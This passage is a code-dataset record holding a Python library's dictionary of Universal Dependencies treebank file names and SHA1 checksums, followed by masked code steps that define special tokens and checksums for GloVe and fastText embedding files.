'39f08896a40ad370f2acc37d58689cdc43a660a9'),
'train': ('nl_lassysmall-ud-train.conllu',
'e4fd6bac246c81bb17a3c932e251b8662739cc19')},
'nl': {'dev': ('nl-ud-dev.conllu',
'33a9387eef9f5c0b15bd1e76e78776863f1f6d90'),
'test': ('nl-ud-test.conllu',
'01b3e1048792c851fdd59882c353fcdb76dc165e'),
'train': ('nl-ud-train.conllu',
'8e6a10152b7d09ce61433dd5f715ab2401611cf6')},
'en_lines': {'dev': ('en_lines-ud-dev.conllu',
'83b63b7670ea4394b558bc26e16a004339f0a0ef'),
'test': ('en_lines-ud-test.conllu',
'ccc9d3c71a873313d138c3adb12405a97eb270d8'),
'train': ('en_lines-ud-train.conllu',
'da42bfac9fd97d98ebbbc37c65d83ff4c53b4e79')},
'en_pud': {'test': ('en_pud-ud-test.conllu',
'4a9c83ba058a7e51979af790ba0440cc274b948f')},
'en_partut': {'dev': ('en_partut-ud-dev.conllu',
'863a6f571158acaaca95223e50bd08fc0c1134f0'),
'test': ('en_partut-ud-test.conllu',
'0c0780b0f14e4623f1014e6496d639cd2d2f6ffd'),
'train': ('en_partut-ud-train.conllu',
'e00a2d6f7efa28c8aaa40dccdf29b59a50f48e18')},
'en': {'dev': ('en-ud-dev.conllu',
'e2159dda4400d289ad8a403b466c8d23d733ba35'),
'test': ('en-ud-test.conllu',
'bd36ef23f76155625b379d063427bd62f19b7658'),
'train': ('en-ud-train.conllu',
'993c44f62104971fe2d056847349facbb7986258')},
'et': {'dev': ('et-ud-dev.conllu',
'312f9477f7ee1dd380c1fbcf77a6f0c63476fdbb'),
'test': ('et-ud-test.conllu',
'd70907f0771b41a27406672b9d91043a0954f946'),
'train': ('et-ud-train.conllu',
'b6d788e7a3362d0984d1cff06c1ba3d66f6bf773')},
'fi_ftb': {'dev': ('fi_ftb-ud-dev.conllu',
'552ec574acdb3209e7545af4e16a43a1e2956979'),
'test': ('fi_ftb-ud-test.conllu',
'13c34838a0fa9e379f9624ed1f4c368ca50a7d98'),
'train': ('fi_ftb-ud-train.conllu',
'73d025250bfc82a24181b5ed601dc4ae7c8e846c')},
'fi_pud': {'test': ('fi_pud-ud-test.conllu',
'4ab7b0d99ce6697d79732e401be97585a28c2afa')},
'fi': {'dev': ('fi-ud-dev.conllu',
'e023cf7eaffbda20bd4518d87fe9086207bb5361'),
'test': ('fi-ud-test.conllu',
'fd57c5106e43994250f4472890572bdbb8b4a48b'),
'train': ('fi-ud-train.conllu',
'ab27bda8cbb62886196b78de87985a4c6cf8215d')},
'fr_ftb': {'dev': ('fr_ftb-ud-dev.conllu',
'71b3cc02601f64711f98e33a6b2af10aa00700be'),
'test': ('fr_ftb-ud-test.conllu',
'723b8c44e74202a18b7e71268b738a5e1aa15f86'),
'train': ('fr_ftb-ud-train.conllu',
'9a347120478254647deb7c7e02871b28aad23ec4')},
'fr_pud': {'test': ('fr_pud-ud-test.conllu',
'570b7e31dc359ed62123bea6546efa13cfc2cf25')},
'fr_partut': {'dev': ('fr_partut-ud-dev.conllu',
'1505030048829a8dccc466cc86bca057996301ae'),
'test': ('fr_partut-ud-test.conllu',
'f6446317c9f82cc0b70a76be75282804a3359ac0'),
'train': ('fr_partut-ud-train.conllu',
'f87c246cfa91186b90c7780cb64783034f196622')},
'fr_sequoia': {'dev': ('fr_sequoia-ud-dev.conllu',
'859b10d80c7b3a382571cce9b2620039673539d1'),
'test': ('fr_sequoia-ud-test.conllu',
'be0ef69e392e64030414748da2995433f23e033d'),
'train': ('fr_sequoia-ud-train.conllu',
'48ac01913518888a32670a687123ed1bac57e0e9')},
'fr': {'dev': ('fr-ud-dev.conllu',
'5de0aee778bcc69d14285ada88f0ff7e5ac0a0cd'),
'test': ('fr-ud-test.conllu',
'd20a014acd38193155a33a5233c13f89541c78c3'),
'train': ('fr-ud-train.conllu',
'feee0cc85a2d7dcb3397399ef22c8af8ef75420b')},
'gl_treegal': {'dev': ('gl_treegal-ud-dev.conllu',
'272558614cff4a5e1f2805626904e6dc488b8d25'),
'test': ('gl_treegal-ud-test.conllu',
'18d99474d3aa9c83878c42a79d7881330dd9b861'),
'train': ('gl_treegal-ud-train.conllu',
'b1691dd5f587a19eb9dc6f141ecbd3eec3bb0e07')},
'gl': {'dev': ('gl-ud-dev.conllu',
'e72390dce9bf973442deef31ed0cd7a975361fe5'),
'test': ('gl-ud-test.conllu',
'7d82ba3672bd4427674428e1dcbcae4feebc3aeb'),
'train': ('gl-ud-train.conllu',
'd586e7bffa314f8c5b85288e060e68dddc1f5d33')},
'de_pud': {'test': ('de_pud-ud-test.conllu',
'2c91e42b7345145290b68385ff5270910048b8c4')},
'de': {'dev': ('de-ud-dev.conllu',
'9b4f49bfa2b609d54369890d9e7d8d24a3c229af'),
'test': ('de-ud-test.conllu',
'48f0f6f98b38710906481b5e9fe1d459d28f1b4a'),
'train': ('de-ud-train.conllu',
'04a1d6a6a2da9d9c38496118e0432c9a6720db64')},
'got': {'dev': ('got-ud-dev.conllu',
'501c47193ca2af5826e4afcc04941df87a7c47c3'),
'test': ('got-ud-test.conllu',
'cfcf16d562434987562bd1f5faa0d8c007e9ddb8'),
'train': ('got-ud-train.conllu',
'b4951ede89d947c6617df782ac248566235f78fb')},
'el': {'dev': ('el-ud-dev.conllu',
'9df0919ed6f9dcab3ba3f60f0ad31d0c79ae6cdb'),
'test': ('el-ud-test.conllu',
'1bb4a6b24521f0c3c7d6cf71e2456ef3a1ee31aa'),
'train': ('el-ud-train.conllu',
'32f4abc821624c4cd4d3b3b555c1558f06366e2c')},
'he': {'dev': ('he-ud-dev.conllu',
'c5b76874fcf11c7733e1555957bb49e8298af140'),
'test': ('he-ud-test.conllu',
'4fbe4115948250fc2e42dd43399d1c6c11ddcfd2'),
'train': ('he-ud-train.conllu',
'eae49a515b38d224b109138bf006a112e80a7caf')},
'hi_pud': {'test': ('hi_pud-ud-test.conllu',
'd237fecc594186e7a52ad33313ac52e927905d73')},
'hi': {'dev': ('hi-ud-dev.conllu',
'48b592bb1aa1cbc30d41d2913421cfd3f9d2c790'),
'test': ('hi-ud-test.conllu',
'004a7fdde368f32f9f230bc5e2cf4ce9e1d8f8d7'),
'train': ('hi-ud-train.conllu',
'9be8afb2cabda361817c55b3de6ebba2c3fef7e0')},
'hu': {'dev': ('hu-ud-dev.conllu',
'ec622e6bcf2a84b0b47eba0de01cf5768157a50e'),
'test': ('hu-ud-test.conllu',
'fd717d25add38c2fb2dc8e82e2f9e5b0b9f3c5b8'),
'train': ('hu-ud-train.conllu',
'e5486523a8bebe40d633ad8b4050be8a3d11c78a')},
'id': {'dev': ('id-ud-dev.conllu',
'7b181aa954a4f4b22b80a18e4f67cbf423e9c701'),
'test': ('id-ud-test.conllu',
'357ed8c216725760bf5be561ed6e918ce602b5ac'),
'train': ('id-ud-train.conllu',
'328ea588b75de55ef48373c2bf9983bca277d724')},
'ga': {'dev': ('ga-ud-dev.conllu',
'180a1a9dcfcec6528a559032c67e9a15693a039d'),
'test': ('ga-ud-test.conllu',
'b74a56372af3f68f089ea82ba858e5a82aae4e22'),
'train': ('ga-ud-train.conllu',
'40df0b12fbadae6e56c0a01da483d6c612d9450c')},
'it_pud': {'test': ('it_pud-ud-test.conllu',
'c7121c03dbdc7d27f89c6f6dd8f046b89233438e')},
'it_partut': {'dev': ('it_partut-ud-dev.conllu',
'0bb5dc0c0815212c9832eaef3b802cf885e0543b'),
'test': ('it_partut-ud-test.conllu',
'b5eccd3d9a94a2f96c8c3a6e4192a287ac563898'),
'train': ('it_partut-ud-train.conllu',
'784b18bf8d3b59d967d147075a3cb5b03fb28637')},
'it_postwita': {'dev': ('it_postwita-ud-dev.conllu',
'07f6f658246aa070e2166e688f7569d61aafff54'),
'test': ('it_postwita-ud-test.conllu',
'c2d58f50e51d37cb5f55bd0a3129138e95a72a8a'),
'train': ('it_postwita-ud-train.conllu',
'69684c47fba99230f6ef1a204b95c37d28eaa5a6')},
'it': {'dev': ('it-ud-dev.conllu',
'ea8fd59f36280fbd77b9a807959491636048a698'),
'test': ('it-ud-test.conllu',
'34839fdeeef883f8034c723a18772947106cec6b'),
'train': ('it-ud-train.conllu',
'a0cae413f46a344366f86bc7ffe4f5d7ecbf6a14')},
'ja_pud': {'test': ('ja_pud-ud-test.conllu',
'4c914016a0968ca434348370d38c9579a60e8fd7')},
'ja': {'dev': ('ja-ud-dev.conllu',
'21f06fef7fbeccd05a298385bf40f8b4ffe95146'),
'test': ('ja-ud-test.conllu',
'240d3532698356a7c6f93c3215718ef2f66a672f'),
'train': ('ja-ud-train.conllu',
'35eaf307d94c2006241fe08f745d7b1b17f049cf')},
'kk': {'dev': ('kk-ud-dev.conllu',
'038033c822b407040a4ecb87c077506cd0d1a322'),
'test': ('kk-ud-test.conllu',
'4124bcaa6e4fc132613d94a882abcff8ecad8ca0'),
'train': ('kk-ud-train.conllu',
'48d664d273ad6731cb65228ce9b57ad3cf50f7f5')},
'ko': {'dev': ('ko-ud-dev.conllu',
'60e7da7cca44c923873a062e80262726659f5528'),
'test': ('ko-ud-test.conllu',
'bc9a0fc4ddfed14b70bb58048bf8b8d50062cffd'),
'train': ('ko-ud-train.conllu',
'ee21328f9ea39668e802f0cb6a794358f5c256bf')},
'kmr': {'sample': ('kmr-ud-sample.conllu',
'd76d631400d17b63b9592ce3c0f4ecada012d6d0'),
'test': ('kmr-ud-test.conllu',
'606a338db2d6adde6b4d7d8c9ee2bdf1f988d729')},
'la_ittb': {'dev': ('la_ittb-ud-dev.conllu',
'd9f17992bd0258a734aea9b6c53759039717c86a'),
'test': ('la_ittb-ud-test.conllu',
'f4d097d076083240c48594d4cb058840ff16be8e'),
'train': ('la_ittb-ud-train.conllu',
'627d5b30b20655efab194c75fc9219b0aa2cf4b6')},
'la_proiel': {'dev': ('la_proiel-ud-dev.conllu',
'9a510ff1f29b507ce46d32c04eb8f02ec8bdb4fb'),
'test': ('la_proiel-ud-test.conllu',
'697dbeae38507856a4fafa8506dfc8db5e8e4054'),
'train': ('la_proiel-ud-train.conllu',
'5e57e0a83ed8dcdfcc892c2558249cb6bc02b37a')},
'la': {'dev': ('la-ud-dev.conllu',
'2748bb0479cb599e1a007d1d1634d5870b45549b'),
'test': ('la-ud-test.conllu',
'19c62c64ce41a650e9b55a345c61e7c0d994816e'),
'train': ('la-ud-train.conllu',
'183ce6f58b0305e5926161e29b9a6aacc424662c')},
'lv': {'dev': ('lv-ud-dev.conllu',
'6bf3843d92aeb5b4a5e3b457708ad0aca176fbd2'),
'test': ('lv-ud-test.conllu',
'9f7806a24656db0e859efe041a88926b220b8e28'),
'train': ('lv-ud-train.conllu',
'f1eeff608e8f27d92b683ae041591355198841eb')},
'lt': {'dev': ('lt-ud-dev.conllu',
'0b8dc19005571fa7b66d8302b797d51a241f128b'),
'test': ('lt-ud-test.conllu',
'def54d6caf97610eb4ca8c0179d661c8eab98951'),
'train': ('lt-ud-train.conllu',
'13fe42a3d21f17a5cad5aaf38692619c7713e177')},
'mr': {'dev': ('mr-ud-dev.conllu',
'abf7ac90a3696bb979e6ddc17cbc0fc761040b1b'),
'test': ('mr-ud-test.conllu',
'b70e2a135e69dc17474951bfd9c7cf3f203d4798'),
'train': ('mr-ud-train.conllu',
'24a1370184054a7f5af647997dca783d6c571242')},
'sme': {'sample': ('sme-ud-sample.conllu',
'8c456f06b363c4d273fc454a49505f783f00fe43'),
'test': ('sme-ud-test.conllu',
'6c2084f60d7f2d1468a0cb4f4a4b9669274b122e'),
'train': ('sme-ud-train.conllu',
'203eab4183fd585efe3fea7e6df493a6746b0a9f')},
'no_bokmaal': {'dev': ('no_bokmaal-ud-dev.conllu',
'3a1aa6646ee62c605a6e5a7b535434ce93d0581f'),
'test': ('no_bokmaal-ud-test.conllu',
'18336ef0e4877ae28eb7d6019afe05b5a53245d5'),
'train': ('no_bokmaal-ud-train.conllu',
'c6a1d75956dfb9376e568bf241b3ee5ebf3be3a5')},
'no_nynorsk': {'dev': ('no_nynorsk-ud-dev.conllu',
'5b95a070d11a61a23fc340ecbbbbb70f86884498'),
'test': ('no_nynorsk-ud-test.conllu',
'3eaab8e4af82de2333521e9be0954ffaf6b1440b'),
'train': ('no_nynorsk-ud-train.conllu',
'79319993097c30ddf28d4c1137b8662f4f35d17e')},
'no_nynorsklia': {'dev': ('no_nynorsklia-ud-dev.conllu',
'f3e3cc9b156784c12e7540b6e09a19963df8d7d9'),
'test': ('no_nynorsklia-ud-test.conllu',
'c43abf4ad0d9c1d844edb9ff0fdf8b00949c4a0b')},
'cu': {'dev': ('cu-ud-dev.conllu',
'0b67035ed5ca52aeefae443611232ed202fb990a'),
'test': ('cu-ud-test.conllu',
'0fed872a5a2480b601c67ebbecf8dcd680b6863b'),
'train': ('cu-ud-train.conllu',
'1c58f7322b96aa65e2b6bbeb5cb5226b46dc3ef0')},
'fa': {'dev': ('fa-ud-dev.conllu',
'098f97ff4c0a6a9dcaafe2c83908b1ff044b4446'),
'test': ('fa-ud-test.conllu',
'0024aa6bad5eceed2e36f77d88578304a5886a80'),
'train': ('fa-ud-train.conllu',
'1692f90f58fb1ed2faaa4e8c5d2d47a37c47082b')},
'pl': {'dev': ('pl-ud-dev.conllu',
'b7af7bee091feb0788eb9793a7102972006421dc'),
'test': ('pl-ud-test.conllu',
'e141e793ba35f8a08510ec1ce494099b5c800ca8'),
'train': ('pl-ud-train.conllu',
'f2227ba184a5030fc47b1aff732e04ae11b9ab94')},
'pt_br': {'dev': ('pt_br-ud-dev.conllu',
'8eedc77096a87fe8ab251100d460780e161e5397'),
'test': ('pt_br-ud-test.conllu',
'37a64e3acef107b62ab62ce478fc36ed112fb58f'),
'train': ('pt_br-ud-train.conllu',
'023cafcb6959d52298ad619f7838f26db9798aa9')},
'pt_pud': {'test': ('pt_pud-ud-test.conllu',
'4f7a98b59255ff58a1a423dda6f2cb7261dcea7d')},
'pt': {'dev': ('pt-ud-dev.conllu',
'2171b4ac2b0726c9dfae6adf394b76be927accab'),
'test': ('pt-ud-test.conllu',
'9e819a4592db42905806141d6fca3b7b20396ce3'),
'train': ('pt-ud-train.conllu',
'b5fbb6598d5cc53a0f7e699adeb4a61948a49b5c')},
'ro_nonstandard': {'test': ('ro_nonstandard-ud-test.conllu',
'300d53091412dc5700dc5cad0fd3e136f7c8cb11'),
'train': ('ro_nonstandard-ud-train.conllu',
'ed97f51129b63857627f838f68f41c9ef8541686')},
'ro': {'dev': ('ro-ud-dev.conllu',
'a320e29582e837fa48bbe0aab8e205cadfcb4a02'),
'test': ('ro-ud-test.conllu',
'0cfe4806a28ebdc02dc7ea58635d8b550c3a9d7b'),
'train': ('ro-ud-train.conllu',
'74beb2aa92d2fca50dbb1a4f716b936afb436ab9')},
'ru_pud': {'test': ('ru_pud-ud-test.conllu',
'bca81ce7aaf3cb8add98b19faecc1d8303901631')},
'ru_syntagrus': {'dev': ('ru_syntagrus-ud-dev.conllu',
'304c6ec7fb5060583af5f890384e3a480f8c3ad5'),
'test': ('ru_syntagrus-ud-test.conllu',
'c138e39b48dc1c66d106e68ee75c6fce28ef780c'),
'train': ('ru_syntagrus-ud-train.conllu',
'8fa56fa80845e4ad946189d1e7af228b5595e312')},
'ru': {'dev': ('ru-ud-dev.conllu',
'd3b11c0fd8a87bfb7ce9666a1888126ae5ddca90'),
'test': ('ru-ud-test.conllu',
'ae13bbf49e0d2fddae8ba2eeacd15a9a77c7bfff'),
'train': ('ru-ud-train.conllu',
'fd43e7323ad2e62a6924fc5b5d48e85c6ab5a430')},
'sa': {'test': ('sa-ud-test.conllu',
'fad3a03a6834884a092b1d326625c6f663e36636')},
'sr': {'dev': ('sr-ud-dev.conllu',
'dcb9a242986285e83512ddaa4b3ada07c4cea17a'),
'test': ('sr-ud-test.conllu',
'0f0c9e394c440bb2dd514bdd6873d3ffef13821b'),
'train': ('sr-ud-train.conllu',
'97ea9bfe4ac97011598fbb5ca20b5cbaf5093334')},
'sk': {'dev': ('sk-ud-dev.conllu',
'c84563c08922d60b0c765e9f9c22d9f6f2765ff9'),
'test': ('sk-ud-test.conllu',
'89af4581c5f9058809f48788eb635a92cda0603c'),
'train': ('sk-ud-train.conllu',
'89e108093bbf5619578955fdadfe200cefd8cf01')},
'sl_sst': {'dev': ('sl_sst-ud-dev.conllu',
'c65ae82123af95ec11f47262546b5ab2fc5735e5'),
'test': ('sl_sst-ud-test.conllu',
'144a0124c1181b49d0c542a4a6d4465e45545f3b'),
'train': ('sl_sst-ud-train.conllu',
'4cbb97d5c19cfb1d85cdd54a13e24de2343a4ac5')},
'sl': {'dev': ('sl-ud-dev.conllu',
'0078572c19574d32defeae9924176da2dd701ede'),
'test': ('sl-ud-test.conllu',
'616ace00e25df99be8dd49b7bf7c48f1093df96a'),
'train': ('sl-ud-train.conllu',
'1462ac69163b30cf1399527e95f686ebf91be2d3')},
'es_ancora': {'dev': ('es_ancora-ud-dev.conllu',
'94b00cc6449a1793b5ba1d9d5c1e4b34ad1cc7d5'),
'test': ('es_ancora-ud-test.conllu',
'8d7dc8d8441e1ca4b54708a5382ed61b48bf7920'),
'train': ('es_ancora-ud-train.conllu',
'95d5bf7ad33304f3440ffb014ac094c4967c303f')},
'es_pud': {'test': ('es_pud-ud-test.conllu',
'c2b17fce1da3bdd2a50d9dd7eca101db1d2907e0')},
'es': {'dev': ('es-ud-dev.conllu',
'4cdb828c492c6b7707af0ab6c7fbf734f770630a'),
'test': ('es-ud-test.conllu',
'afd1ae1b7eb73a91456c30acf388eef4faf4785a'),
'train': ('es-ud-train.conllu',
'5ce48b44ba1b3e748a40cb5bf893d3096518ecbc')},
'sv_lines': {'dev': ('sv_lines-ud-dev.conllu',
'15f1a04d960518fe7bfee23ce227fc7b78d4b755'),
'test': ('sv_lines-ud-test.conllu',
'843df4ea3ab4f551b1eaa661652a8d6489a81d41'),
'train': ('sv_lines-ud-train.conllu',
'16e3533bf174b36d728847a36a3600f16c63baa6')},
'sv_pud': {'test': ('sv_pud-ud-test.conllu',
'18dadac0c15468256b340835ebc0529facbe9b73')},
'sv': {'dev': ('sv-ud-dev.conllu',
'6d14e1aae5c9ae37c35481c44c04bf74a4233455'),
'test': ('sv-ud-test.conllu',
'7ead0f7b49508db0022c042195ac5925b611c5b7'),
'train': ('sv-ud-train.conllu',
'68affb85efde6ed017eab1e998e9666108559e04')},
'swl': {'dev': ('swl-ud-dev.conllu',
'828e0a08f12cabfa75f9dd2b53dba58606522a7c'),
'test': ('swl-ud-test.conllu',
'674f76631cf16172d67b795ff92dfbb297eb4930'),
'train': ('swl-ud-train.conllu',
'46b721f9cae2d5ba43f818dd487600b0ce76362a')},
'ta': {'dev': ('ta-ud-dev.conllu',
'4d01f555012ddc1976933d4d928e26470f71bfa1'),
'test': ('ta-ud-test.conllu',
'e8db8816a98d8b7e81188786db7c405979a7e3c3'),
'train': ('ta-ud-train.conllu',
'6753d8c7b1b016de39c087aab45056de6021c3ae')},
'te': {'dev': ('te-ud-dev.conllu',
'29f46355d767e54e8565f76a063c43e95ead0fca'),
'test': ('te-ud-test.conllu',
'50abe345d4ab5bae021cacd096266c57b00572b8'),
'train': ('te-ud-train.conllu',
'1794469abe09e7364cda0d9764cf515dcb4a61b6')},
'tr_pud': {'test': ('tr_pud-ud-test.conllu',
'aae839e2476a2f149c98e0274d245d07a50dafaa')},
'tr': {'dev': ('tr-ud-dev.conllu',
'421de4d8d0fbdda46750523bde72880414c134a3'),
'test': ('tr-ud-test.conllu',
'b175f136f6f0271c494a58a1846971c4a07cda27'),
'train': ('tr-ud-train.conllu',
'5aeaf25fc9e00c75e377983a0d0a642e4df6ae7d')},
'uk': {'dev': ('uk-ud-dev.conllu',
'0d3e3507edcd46a3eaa8c4702d0f5d84661a6d9d'),
'test': ('uk-ud-test.conllu',
'46c88fd623894fabdafb01a826016c215e4f65cc'),
'train': ('uk-ud-train.conllu',
'd06e0e2fa67c35a20517738bd728ac3b26d8eafe')},
'hsb': {'sample': ('hsb-ud-sample.conllu',
'148eddbb19b06115ea54e17a3fca58e99a85cbd9'),
'test': ('hsb-ud-test.conllu',
'3d319288b4c06395b2627980737131995949f770')},
'ur': {'dev': ('ur-ud-dev.conllu',
'dc41e72b5adeb92f308cdc8dfcbf71f84b4a5cf9'),
'test': ('ur-ud-test.conllu',
'af5da25be4c4ec1f2a222bc462b39ca4bbcc0eb0'),
'train': ('ur-ud-train.conllu',
'488d65b394d0de264be1221614c09e541f92f9de')},
'ug': {'dev': ('ug-ud-dev.conllu',
'a2e6cd7ef51ffd7c83de7c62fbad998f1020f857'),
'test': ('ug-ud-test.conllu',
'4877323d8dbfaa8ab862f0aa8e5484fdadb9ef43')},
'vi': {'dev': ('vi-ud-dev.conllu',
'1c733d3ea3e4cce00cb0aa4d599bcb3b0a6096a8'),
'test': ('vi-ud-test.conllu',
'1bb822e58f21aa5ccac15fe6c6742a42e8389d41'),
'train': ('vi-ud-train.conllu',
'ac86132afc061625740abd524c5cdf3d35ebbbc4')}}
|
normal
|
{
"blob_id": "4dde161d25ed41154e13b94cc9640c6aac055f87",
"index": 6164,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nUNK_TOKEN = '<unk>'\nBOS_TOKEN = '<bos>'\nEOS_TOKEN = '<eos>'\nPAD_TOKEN = '<pad>'\nUNK_IDX = 0\nLARGE_POSITIVE_FLOAT = 1e+18\nLARGE_NEGATIVE_FLOAT = -LARGE_POSITIVE_FLOAT\nGLOVE_NPZ_SHA1 = {'glove.42B.300d': ('glove.42B.300d.npz',\n '7deee8f4860744db53ed9e50892effe9883e6d89'), 'glove.6B.100d': (\n 'glove.6B.100d.npz', '01f80f202fcabcc3e0804898349087bfc191dd1c'),\n 'glove.6B.200d': ('glove.6B.200d.npz',\n '5e6e2bdab346c257f88d80d215d518e680d86e32'), 'glove.6B.300d': (\n 'glove.6B.300d.npz', '1db264aa936be62f055dfb72854204450bdf4399'),\n 'glove.6B.50d': ('glove.6B.50d.npz',\n 'aa16be8d184399d2199f83fd62586f2c30497bfa'), 'glove.840B.300d': (\n 'glove.840B.300d.npz', 'b4ba390c1154736e07c0e67d9180935f5930e83c'),\n 'glove.twitter.27B.100d': ('glove.twitter.27B.100d.npz',\n '0f7b82c223451d0002f79ba23596983cdbe0e2b1'), 'glove.twitter.27B.200d':\n ('glove.twitter.27B.200d.npz',\n '41cc2d26f58a54622ce96bf6c8434360ab524f20'), 'glove.twitter.27B.25d': (\n 'glove.twitter.27B.25d.npz', '9f563d2f296995598cc46812b2fda05ad4c3c879'\n ), 'glove.twitter.27B.50d': ('glove.twitter.27B.50d.npz',\n 'ce9959c056f2a0a780c468feeb4f823af51630e9')}\nFAST_TEXT_NPZ_SHA1 = {'crawl-300d-2M': ('crawl-300d-2M.npz',\n '9dd611a1fe280c63050cd546d3595400fc0eede4'), 'wiki.aa': ('wiki.aa.npz',\n '48f163b80eb37f1806142169d3d4c05cf75b7339'), 'wiki.ab': ('wiki.ab.npz',\n '860ceff119dd27e5b701b605879037c1310cbc3e'), 'wiki.ace': (\n 'wiki.ace.npz', '62938287464040491719f56a6f521f8f808beee8'), 'wiki.ady':\n ('wiki.ady.npz', '646843afa260d018ed711df3f1ca9c3e000447b6'), 'wiki.af':\n ('wiki.af.npz', '7b14cd27690b67fea318d0bac2283c16430680e2'), 'wiki.ak':\n ('wiki.ak.npz', '20f309adad1c45958c97b6055d5838e05bbaea72'), 'wiki.als':\n ('wiki.als.npz', 'a8b03aa133c4f7da12fc27c2b167b7918b1e9805'), 'wiki.am':\n ('wiki.am.npz', 'ed3dd10cea64737f7a1623612ee099df9dc19f66'), 'wiki.ang':\n ('wiki.ang.npz', '8efe64706d9d6b8eae38b2c7ff0b277e20592bc7'), 'wiki.an':\n ('wiki.an.npz', '168046283c719ab96a29b1abae2e25a6575c7be8'), 'wiki.arc':\n ('wiki.arc.npz', '049021b7decea4bc009b12936e56b4dbf5b760e7'), 'wiki.ar':\n ('wiki.ar.npz', '7e325e1e98dfcdc9368d2ebe40ee834a2ed44912'), 'wiki.arz':\n ('wiki.arz.npz', '7d851c2c7be3ee6f7fd896de7b76ea08e3fb08b0'), 'wiki.as':\n ('wiki.as.npz', '01d38c29cd4bd99c1a8534abc058822da14a5b9c'), 'wiki.ast':\n ('wiki.ast.npz', '9c9846ba5084505a0adea89c95c66e04efbf5ce9'), 'wiki.av':\n ('wiki.av.npz', '7ef6a920c364638504e673cfde5f7675503fa81e'), 'wiki.ay':\n ('wiki.ay.npz', 'c1202e110930e3902397f5cb64a8359e013b469f'), 'wiki.azb':\n ('wiki.azb.npz', '10351b7ef14ec2cb610d290cb6a3f6987ef5d8b3'), 'wiki.az':\n ('wiki.az.npz', '74257c3bcd533a606afae509ea835dc036d61546'), 'wiki.ba':\n ('wiki.ba.npz', '4a2857ed694d66864df562b376c2fa12fcb03646'), 'wiki.bar':\n ('wiki.bar.npz', 'e65c6b7e9ff83798d1eea05d166148837d53e615'),\n 'wiki.bat_smg': ('wiki.bat_smg.npz',\n '6420584ae28ba6c9dd145fea8f096243d457c2d8'), 'wiki.bcl': (\n 'wiki.bcl.npz', '33606c970ab336b678393e2bdb8af2116d11cf7b'), 'wiki.be':\n ('wiki.be.npz', '84487d341e333344cf71bc12c7a205d923762498'), 'wiki.bg':\n ('wiki.bg.npz', '56f2a175b1a1d1a9cf9f1cea277cd0b46ffd7f66'), 'wiki.bh':\n ('wiki.bh.npz', '07473989853a344a41aaa18f41030dc56d0d01c7'), 'wiki.bi':\n ('wiki.bi.npz', '08adfa3c9ef3016d30ef69ea539d217ff67eda09'), 'wiki.bjn':\n ('wiki.bjn.npz', '998a551283222931d3a26922308449950bfa3ec7'), 'wiki.bm':\n ('wiki.bm.npz', '454ff9fbd4790e4a076d9a2087a51da28aa1332f'), 'wiki.bn':\n ('wiki.bn.npz', '1f36f6f39c9a9b33bb8035c9a4dc7e04933604fd'), 'wiki.bo':\n ('wiki.bo.npz', 'b9fe87318428de0a7790de175b5fec80c5af482d'), 'wiki.bpy':\n ('wiki.bpy.npz', '5c7853173d27e2c018c24eca69de8d5f34511b0d'), 'wiki.br':\n ('wiki.br.npz', '7aa66a2034fbfaa1d39e637385d48610238797c9'), 'wiki.bs':\n ('wiki.bs.npz', 'a019a4677677c2e9e4d899326b2b6c15ad6c011a'), 'wiki.bug':\n ('wiki.bug.npz', '09ae3477941d7a99d1df494368d7efb0b2c18913'),\n 'wiki.bxr': ('wiki.bxr.npz', 'b832c691b8ddd95896c052d3d15e1f98d72068d5'\n ), 'wiki.ca': ('wiki.ca.npz',\n '391e0d4daad08649251274fa1cc2a5f49c7728b1'), 'wiki.cbk_zam': (\n 'wiki.cbk_zam.npz', '02e57a763bc9f9eadaba57953383dd12a0a78a37'),\n 'wiki.cdo': ('wiki.cdo.npz', 'd6e8f422327e8b2273f1f2662d793707ece6695d'\n ), 'wiki.ceb': ('wiki.ceb.npz',\n '23bc0bb9aeaa57dff35092766941a866de142aae'), 'wiki.ce': ('wiki.ce.npz',\n '182b2a889256119a6d379d501c55c7621e5855db'), 'wiki.ch': ('wiki.ch.npz',\n '82dd77512fcb463481f43c9cef3507e2baa90d7b'), 'wiki.cho': (\n 'wiki.cho.npz', 'b0b620fc2442d1a6e2440e71a424861c80175f0c'), 'wiki.chr':\n ('wiki.chr.npz', '3d62c6b95c5af46abd6234426ae760cca65d5bd0'),\n 'wiki.chy': ('wiki.chy.npz', '34a28a22da79aebc100e3714b825c95c8d5f54a3'\n ), 'wiki.ckb': ('wiki.ckb.npz',\n 'ad19461e4be583d08b7693ff5b1e9d590ed41add'), 'wiki.co': ('wiki.co.npz',\n 'fa60d9f0e79f1c7e15f381aef983a0f4f31c05a8'), 'wiki.crh': (\n 'wiki.crh.npz', '540270ba6edd9d7b2f7efca52b3b407524ac67d1'), 'wiki.cr':\n ('wiki.cr.npz', 'f06b77465a38ec960d7d5a7554b848c37e945c76'), 'wiki.csb':\n ('wiki.csb.npz', 'b8b28559cf2541341af98e2aa755856765bdeabf'), 'wiki.cs':\n ('wiki.cs.npz', '19881e931fe06abf341450f00c342d364313e232'), 'wiki.cu':\n ('wiki.cu.npz', '731e0d00abd53bc2a8eb6cf37f6ab883cff34e15'), 'wiki.cv':\n ('wiki.cv.npz', 'e60034fcffb7dfef7b236ddba1194c3aa20b7967'), 'wiki.cy':\n ('wiki.cy.npz', '5a0fb967b5556f007c0d5065f951a3d3b1c1005a'), 'wiki.da':\n ('wiki.da.npz', 'd06258014ba2c7450bc2d55edfdf1731433e42e5'), 'wiki.de':\n ('wiki.de.npz', 'a21694dfd2af63bd7bb00f0b60b28e88bd1153f1'), 'wiki.diq':\n ('wiki.diq.npz', '4f6c77a86b39834a7130419967759afd8cc26b84'),\n 'wiki.dsb': ('wiki.dsb.npz', 'e74f1d346a8db96987bff0c33ee5f886907c380a'\n ), 'wiki.dv': ('wiki.dv.npz',\n '5d6fe6f0eec2e7704121d5aba03b4edbb28af873'), 'wiki.dz': ('wiki.dz.npz',\n '77c639d36d0355b2de5adead7996eae342b852a6'), 'wiki.ee': ('wiki.ee.npz',\n '4b5a76127d57515d3e8a76787cdefde5856b754a'), 'wiki.el': ('wiki.el.npz',\n 'a00bcb97e7898931196a1c69f7a492e5b6202661'), 'wiki.eml': (\n 'wiki.eml.npz', 'b475d626b3d97e7a68c02827fdc7900599e838c6'), 'wiki.en':\n ('wiki.en.npz', 'ad5ec6d49db6c6fe76b8e85ff05d34e5d0e1eb6a'), 'wiki.eo':\n ('wiki.eo.npz', '18049b0010520d13e676f5a82e8bb90153d99003'), 'wiki.es':\n ('wiki.es.npz', 'a6d192ba7d82d762f8367e75ca951aad4d11e410'), 'wiki.et':\n ('wiki.et.npz', 